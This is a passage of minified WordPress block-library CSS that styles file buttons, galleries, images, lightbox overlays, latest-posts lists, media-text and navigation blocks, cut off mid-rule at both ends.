*+.wp-block-file__button{margin-left:.75em}:where(.wp-block-file){margin-bottom:1.5em}.wp-block-file__embed{margin-bottom:1em}:where(.wp-block-file__button){border-radius:2em;display:inline-block;padding:.5em 1em}:where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{box-shadow:none;color:#fff;opacity:.85;text-decoration:none}.blocks-gallery-grid:not(.has-nested-images),.wp-block-gallery:not(.has-nested-images){display:flex;flex-wrap:wrap;list-style-type:none;margin:0;padding:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item{display:flex;flex-direction:column;flex-grow:1;justify-content:center;margin:0 1em 1em 0;position:relative;width:calc(50% - 1em)}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n){margin-right:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figure,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figure{align-items:flex-end;display:flex;height:100%;justify-content:flex-start;margin:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item img{display:block;height:auto;max-width:100%;width:auto}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption{background:linear-gradient(0deg,rgba(0,0,0,.7),rgba(0,0,0,.3) 70%,transparent);bottom:0;box-sizing:border-box;color:#fff;font-size:.8em;margin:0;max-height:100%;overflow:auto;padding:3em .77em .7em;position:absolute;text-align:center;width:100%;z-index:2}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption img{display:inline}.blocks-gallery-grid:not(.has-nested-images) figcaption,.wp-block-gallery:not(.has-nested-images) figcaption{flex-grow:1}.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item img{flex:1;height:100%;object-fit:cover;width:100%}.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item{margin-right:0;width:100%}@media (min-width:600px){.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item{margin-right:1em;width:calc(33.33333% - .66667em)}.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item{margin-right:1em;width:calc(25% - .75em)}.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item{margin-right:1em;width:calc(20% - .8em)}.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item{margin-right:1em;width:calc(16.66667% - .83333em)}.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item{margin-right:1em;width:calc(14.28571% - .85714em)}.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item{margin-right:1em;width:calc(12.5% - .875em)}.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n){margin-right:0}}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:last-child,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:last-child{margin-right:0}.blocks-gallery-grid:not(.has-nested-images).alignleft,.blocks-gallery-grid:not(.has-nested-images).alignright,.wp-block-gallery:not(.has-nested-images).alignleft,.wp-block-gallery:not(.has-nested-images).alignright{max-width:420px;width:100%}.blocks-gallery-grid:not(.has-nested-images).aligncenter .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images).aligncenter .blocks-gallery-item figure{justify-content:center}.wp-block-gallery:not(.is-cropped) .blocks-gallery-item{align-self:flex-start}figure.wp-block-gallery.has-nested-images{align-items:normal}.wp-block-gallery.has-nested-images figure.wp-block-image:not(#individual-image){margin:0;width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)/2)}.wp-block-gallery.has-nested-images figure.wp-block-image{box-sizing:border-box;display:flex;flex-direction:column;flex-grow:1;justify-content:center;max-width:100%;position:relative}.wp-block-gallery.has-nested-images figure.wp-block-image>a,.wp-block-gallery.has-nested-images figure.wp-block-image>div{flex-direction:column;flex-grow:1;margin:0}.wp-block-gallery.has-nested-images figure.wp-block-image img{display:block;height:auto;max-width:100%!important;width:auto}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{background:linear-gradient(0deg,rgba(0,0,0,.7),rgba(0,0,0,.3) 70%,transparent);bottom:0;box-sizing:border-box;color:#fff;font-size:13px;left:0;margin-bottom:0;max-height:60%;overflow:auto;padding:0 8px 8px;position:absolute;text-align:center;width:100%}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption img{display:inline}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption a{color:inherit}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border img{box-sizing:border-box}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>a,.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>div,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>a,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>div{flex:1 1 auto}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded figcaption{background:none;color:inherit;flex:initial;margin:0;padding:10px 10px 9px;position:relative}.wp-block-gallery.has-nested-images figcaption{flex-basis:100%;flex-grow:1;text-align:center}.wp-block-gallery.has-nested-images:not(.is-cropped) figure.wp-block-image:not(#individual-image){margin-bottom:auto;margin-top:0}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image){align-self:inherit}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>div:not(.components-drop-zone){display:flex}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) img{flex:1 0 0%;height:100%;object-fit:cover;width:100%}.wp-block-gallery.has-nested-images.columns-1 figure.wp-block-image:not(#individual-image){width:100%}@media (min-width:600px){.wp-block-gallery.has-nested-images.columns-3 figure.wp-block-image:not(#individual-image){width:calc(33.33333% - var(--wp--style--unstable-gallery-gap, 16px)*.66667)}.wp-block-gallery.has-nested-images.columns-4 figure.wp-block-image:not(#individual-image){width:calc(25% - var(--wp--style--unstable-gallery-gap, 16px)*.75)}.wp-block-gallery.has-nested-images.columns-5 figure.wp-block-image:not(#individual-image){width:calc(20% - var(--wp--style--unstable-gallery-gap, 16px)*.8)}.wp-block-gallery.has-nested-images.columns-6 figure.wp-block-image:not(#individual-image){width:calc(16.66667% - var(--wp--style--unstable-gallery-gap, 16px)*.83333)}.wp-block-gallery.has-nested-images.columns-7 figure.wp-block-image:not(#individual-image){width:calc(14.28571% - var(--wp--style--unstable-gallery-gap, 16px)*.85714)}.wp-block-gallery.has-nested-images.columns-8 figure.wp-block-image:not(#individual-image){width:calc(12.5% - var(--wp--style--unstable-gallery-gap, 16px)*.875)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image){width:calc(33.33% - var(--wp--style--unstable-gallery-gap, 16px)*.66667)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2),.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2)~figure.wp-block-image:not(#individual-image){width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)*.5)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:last-child{width:100%}}.wp-block-gallery.has-nested-images.alignleft,.wp-block-gallery.has-nested-images.alignright{max-width:420px;width:100%}.wp-block-gallery.has-nested-images.aligncenter{justify-content:center}.wp-block-group{box-sizing:border-box}h1.has-background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}h1.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){rotate:180deg}.wp-block-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom}.wp-block-image[style*=border-radius] img,.wp-block-image[style*=border-radius]>a{border-radius:inherit}.wp-block-image.has-custom-border img{box-sizing:border-box}.wp-block-image.aligncenter{text-align:center}.wp-block-image.alignfull img,.wp-block-image.alignwide img{height:auto;width:100%}.wp-block-image .aligncenter,.wp-block-image .alignleft,.wp-block-image .alignright,.wp-block-image.aligncenter,.wp-block-image.alignleft,.wp-block-image.alignright{display:table}.wp-block-image .aligncenter>figcaption,.wp-block-image .alignleft>figcaption,.wp-block-image .alignright>figcaption,.wp-block-image.aligncenter>figcaption,.wp-block-image.alignleft>figcaption,.wp-block-image.alignright>figcaption{caption-side:bottom;display:table-caption}.wp-block-image .alignleft{float:left;margin:.5em 1em .5em 0}.wp-block-image .alignright{float:right;margin:.5em 0 .5em 1em}.wp-block-image .aligncenter{margin-left:auto;margin-right:auto}.wp-block-image figcaption{margin-bottom:1em;margin-top:.5em}.wp-block-image .is-style-rounded img,.wp-block-image.is-style-circle-mask img,.wp-block-image.is-style-rounded img{border-radius:9999px}@supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){.wp-block-image.is-style-circle-mask img{border-radius:0;-webkit-mask-image:url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="50"/></svg>');mask-image:url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="50"/></svg>');mask-mode:alpha;-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain}}.wp-block-image :where(.has-border-color){border-style:solid}.wp-block-image :where([style*=border-top-color]){border-top-style:solid}.wp-block-image :where([style*=border-right-color]){border-right-style:solid}.wp-block-image :where([style*=border-bottom-color]){border-bottom-style:solid}.wp-block-image :where([style*=border-left-color]){border-left-style:solid}.wp-block-image :where([style*=border-width]){border-style:solid}.wp-block-image :where([style*=border-top-width]){border-top-style:solid}.wp-block-image :where([style*=border-right-width]){border-right-style:solid}.wp-block-image :where([style*=border-bottom-width]){border-bottom-style:solid}.wp-block-image :where([style*=border-left-width]){border-left-style:solid}.wp-block-image figure{margin:0}.wp-lightbox-container{display:flex;flex-direction:column;position:relative}.wp-lightbox-container img{cursor:zoom-in}.wp-lightbox-container img:hover+button{opacity:1}.wp-lightbox-container button{align-items:center;-webkit-backdrop-filter:blur(16px) saturate(180%);backdrop-filter:blur(16px) saturate(180%);background-color:rgba(90,90,90,.25);border:none;border-radius:4px;cursor:zoom-in;display:flex;height:20px;justify-content:center;opacity:0;padding:0;position:absolute;right:16px;text-align:center;top:16px;transition:opacity .2s ease;width:20px;z-index:100}.wp-lightbox-container button:focus-visible{outline:3px auto rgba(90,90,90,.25);outline:3px auto -webkit-focus-ring-color;outline-offset:3px}.wp-lightbox-container button:hover{cursor:pointer;opacity:1}.wp-lightbox-container button:focus{opacity:1}.wp-lightbox-container button:focus,.wp-lightbox-container button:hover,.wp-lightbox-container button:not(:hover):not(:active):not(.has-background){background-color:rgba(90,90,90,.25);border:none}.wp-lightbox-overlay{box-sizing:border-box;cursor:zoom-out;height:100vh;left:0;overflow:hidden;position:fixed;top:0;visibility:hidden;width:100vw;z-index:100000}.wp-lightbox-overlay .close-button{align-items:center;cursor:pointer;display:flex;justify-content:center;min-height:40px;min-width:40px;padding:0;position:absolute;right:calc(env(safe-area-inset-right) + 16px);top:calc(env(safe-area-inset-top) + 16px);z-index:5000000}.wp-lightbox-overlay .close-button:focus,.wp-lightbox-overlay .close-button:hover,.wp-lightbox-overlay .close-button:not(:hover):not(:active):not(.has-background){background:none;border:none}.wp-lightbox-overlay .lightbox-image-container{height:var(--wp--lightbox-container-height);left:50%;overflow:hidden;position:absolute;top:50%;transform:translate(-50%,-50%);transform-origin:top left;width:var(--wp--lightbox-container-width);z-index:9999999999}.wp-lightbox-overlay .wp-block-image{align-items:center;box-sizing:border-box;display:flex;height:100%;justify-content:center;margin:0;position:relative;transform-origin:0 0;width:100%;z-index:3000000}.wp-lightbox-overlay .wp-block-image img{height:var(--wp--lightbox-image-height);min-height:var(--wp--lightbox-image-height);min-width:var(--wp--lightbox-image-width);width:var(--wp--lightbox-image-width)}.wp-lightbox-overlay .wp-block-image figcaption{display:none}.wp-lightbox-overlay button{background:none;border:none}.wp-lightbox-overlay .scrim{background-color:#fff;height:100%;opacity:.9;position:absolute;width:100%;z-index:2000000}.wp-lightbox-overlay.active{animation:turn-on-visibility .25s both;visibility:visible}.wp-lightbox-overlay.active img{animation:turn-on-visibility .35s both}.wp-lightbox-overlay.hideanimationenabled:not(.active){animation:turn-off-visibility .35s both}.wp-lightbox-overlay.hideanimationenabled:not(.active) img{animation:turn-off-visibility .25s both}@media (prefers-reduced-motion:no-preference){.wp-lightbox-overlay.zoom.active{animation:none;opacity:1;visibility:visible}.wp-lightbox-overlay.zoom.active .lightbox-image-container{animation:lightbox-zoom-in .4s}.wp-lightbox-overlay.zoom.active .lightbox-image-container img{animation:none}.wp-lightbox-overlay.zoom.active .scrim{animation:turn-on-visibility .4s forwards}.wp-lightbox-overlay.zoom.hideanimationenabled:not(.active){animation:none}.wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .lightbox-image-container{animation:lightbox-zoom-out .4s}.wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .lightbox-image-container img{animation:none}.wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .scrim{animation:turn-off-visibility .4s forwards}}@keyframes turn-on-visibility{0%{opacity:0}to{opacity:1}}@keyframes turn-off-visibility{0%{opacity:1;visibility:visible}99%{opacity:0;visibility:visible}to{opacity:0;visibility:hidden}}@keyframes lightbox-zoom-in{0%{transform:translate(calc(-50vw + var(--wp--lightbox-initial-left-position)),calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale))}to{transform:translate(-50%,-50%) scale(1)}}@keyframes lightbox-zoom-out{0%{transform:translate(-50%,-50%) scale(1);visibility:visible}99%{visibility:visible}to{transform:translate(calc(-50vw + var(--wp--lightbox-initial-left-position)),calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale));visibility:hidden}}ol.wp-block-latest-comments{box-sizing:border-box;margin-left:0}:where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment)){line-height:1.1}:where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment-excerpt p)){line-height:1.8}.has-dates :where(.wp-block-latest-comments:not([style*=line-height])),.has-excerpts :where(.wp-block-latest-comments:not([style*=line-height])){line-height:1.5}.wp-block-latest-comments .wp-block-latest-comments{padding-left:0}.wp-block-latest-comments__comment{list-style:none;margin-bottom:1em}.has-avatars .wp-block-latest-comments__comment{list-style:none;min-height:2.25em}.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-excerpt,.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-meta{margin-left:3.25em}.wp-block-latest-comments__comment-excerpt p{font-size:.875em;margin:.36em 0 1.4em}.wp-block-latest-comments__comment-date{display:block;font-size:.75em}.wp-block-latest-comments .avatar,.wp-block-latest-comments__comment-avatar{border-radius:1.5em;display:block;float:left;height:2.5em;margin-right:.75em;width:2.5em}.wp-block-latest-comments[class*=-font-size] a,.wp-block-latest-comments[style*=font-size] a{font-size:inherit}.wp-block-latest-posts{box-sizing:border-box}.wp-block-latest-posts.alignleft{margin-right:2em}.wp-block-latest-posts.alignright{margin-left:2em}.wp-block-latest-posts.wp-block-latest-posts__list{list-style:none;padding-left:0}.wp-block-latest-posts.wp-block-latest-posts__list li{clear:both}.wp-block-latest-posts.is-grid{display:flex;flex-wrap:wrap;padding:0}.wp-block-latest-posts.is-grid li{margin:0 1.25em 1.25em 0;width:100%}@media (min-width:600px){.wp-block-latest-posts.columns-2 li{width:calc(50% - .625em)}.wp-block-latest-posts.columns-2 li:nth-child(2n){margin-right:0}.wp-block-latest-posts.columns-3 li{width:calc(33.33333% - .83333em)}.wp-block-latest-posts.columns-3 li:nth-child(3n){margin-right:0}.wp-block-latest-posts.columns-4 li{width:calc(25% - .9375em)}.wp-block-latest-posts.columns-4 li:nth-child(4n){margin-right:0}.wp-block-latest-posts.columns-5 li{width:calc(20% - 1em)}.wp-block-latest-posts.columns-5 li:nth-child(5n){margin-right:0}.wp-block-latest-posts.columns-6 li{width:calc(16.66667% - 1.04167em)}.wp-block-latest-posts.columns-6 li:nth-child(6n){margin-right:0}}.wp-block-latest-posts__post-author,.wp-block-latest-posts__post-date{display:block;font-size:.8125em}.wp-block-latest-posts__post-excerpt{margin-bottom:1em;margin-top:.5em}.wp-block-latest-posts__featured-image a{display:inline-block}.wp-block-latest-posts__featured-image img{height:auto;max-width:100%;width:auto}.wp-block-latest-posts__featured-image.alignleft{float:left;margin-right:1em}.wp-block-latest-posts__featured-image.alignright{float:right;margin-left:1em}.wp-block-latest-posts__featured-image.aligncenter{margin-bottom:1em;text-align:center}ol,ul{box-sizing:border-box}ol.has-background,ul.has-background{padding:1.25em 2.375em}.wp-block-media-text{box-sizing:border-box; /*!rtl:begin:ignore*/direction:ltr; /*!rtl:end:ignore*/display:grid;grid-template-columns:50% 1fr;grid-template-rows:auto}.wp-block-media-text.has-media-on-the-right{grid-template-columns:1fr 50%}.wp-block-media-text.is-vertically-aligned-top .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-top .wp-block-media-text__media{align-self:start}.wp-block-media-text .wp-block-media-text__content,.wp-block-media-text .wp-block-media-text__media,.wp-block-media-text.is-vertically-aligned-center .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-center .wp-block-media-text__media{align-self:center}.wp-block-media-text.is-vertically-aligned-bottom .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-bottom .wp-block-media-text__media{align-self:end}.wp-block-media-text .wp-block-media-text__media{ /*!rtl:begin:ignore*/grid-column:1;grid-row:1; /*!rtl:end:ignore*/margin:0}.wp-block-media-text .wp-block-media-text__content{direction:ltr; /*!rtl:begin:ignore*/grid-column:2;grid-row:1; /*!rtl:end:ignore*/padding:0 8%;word-break:break-word}.wp-block-media-text.has-media-on-the-right .wp-block-media-text__media{ /*!rtl:begin:ignore*/grid-column:2;grid-row:1 /*!rtl:end:ignore*/}.wp-block-media-text.has-media-on-the-right .wp-block-media-text__content{ /*!rtl:begin:ignore*/grid-column:1;grid-row:1 /*!rtl:end:ignore*/}.wp-block-media-text__media img,.wp-block-media-text__media video{height:auto;max-width:unset;vertical-align:middle;width:100%}.wp-block-media-text.is-image-fill .wp-block-media-text__media{background-size:cover;height:100%;min-height:250px}.wp-block-media-text.is-image-fill .wp-block-media-text__media>a{display:block;height:100%}.wp-block-media-text.is-image-fill .wp-block-media-text__media img{clip:rect(0,0,0,0);border:0;height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}@media (max-width:600px){.wp-block-media-text.is-stacked-on-mobile{grid-template-columns:100%!important}.wp-block-media-text.is-stacked-on-mobile .wp-block-media-text__media{grid-column:1;grid-row:1}.wp-block-media-text.is-stacked-on-mobile .wp-block-media-text__content{grid-column:1;grid-row:2}}.wp-block-navigation{--navigation-layout-justification-setting:flex-start;--navigation-layout-direction:row;--navigation-layout-wrap:wrap;--navigation-layout-justify:flex-start;--navigation-layout-align:center;position:relative}.wp-block-navigation ul{margin-bottom:0;margin-left:0;margin-top:0;padding-left:0}.wp-block-navigation ul,.wp-block-navigation ul li{list-style:none;padding:0}.wp-block-navigation .wp-block-navigation-item{align-items:center;display:flex;position:relative}.wp-block-navigation .wp-block-navigation-item .wp-block-navigation__submenu-container:empty{display:none}.wp-block-navigation .wp-block-navigation-item__content{display:block}.wp-block-navigation .wp-block-navigation-item__content.wp-block-navigation-item__content{color:inherit}.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:focus{text-decoration:underline}.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:focus{text-decoration:line-through}.wp-block-navigation:where(:not([class*=has-text-decoration])) a{text-decoration:none}.wp-block-navigation:where(:not([class*=has-text-decoration])) a:active,.wp-block-navigation:where(:not([class*=has-text-decoration])) a:focus{text-decoration:none}.wp-block-navigation .wp-block-navigation__submenu-icon{align-self:center;background-color:inherit;border:none;color:currentColor;display:inline-block;font-size:inherit;height:.6em;line-height:0;margin-left:.25em;padding:0;width:.6em}.wp-block-navigation .wp-block-navigation__submenu-icon svg{stroke:currentColor;display:inline-block;height:inherit;margin-top:.075em;width:inherit}.wp-block-navigation.is-vertical{--navigation-layout-direction:column;--navigation-layout-justify:initial;--navigation-layout-align:flex-start}.wp-block-navigation.no-wrap{--navigation-layout-wrap:nowrap}.wp-block-navigation.items-justified-center{--navigation-layout-justification-setting:center;--navigation-layout-justify:center}.wp-block-navigation.items-justified-center.is-vertical{--navigation-layout-align:center}.wp-block-navigation.items-justified-right{--navigation-layout-justification-setting:flex-end;--navigation-layout-justify:flex-end}.wp-block-navigation.items-justified-right.is-vertical{--navigation-layout-align:flex-end}.wp-block-navigation.items-justified-space-between{--navigation-layout-justification-setting:space-between;--navigation-layout-justify:space-between}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{align-items:normal;background-color:inherit;color:inherit;display:flex;flex-direction:column;height:0;left:-1px;opacity:0;overflow:hidden;position:absolute;top:100%;transition:opacity .1s linear;visibility:hidden;width:0;z-index:2}.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content{display:flex;flex-grow:1}.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content .wp-block-navigation__submenu-icon{margin-left:auto;margin-right:0}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation-item__content{margin:0}@media (min-width:782px){.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:100%;top:-1px}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{background:transparent;content:"";display:block;height:100%;position:absolute;right:100%;width:.5em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon{margin-right:.25em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon svg{transform:rotate(-90deg)}}.wp-block-navigation 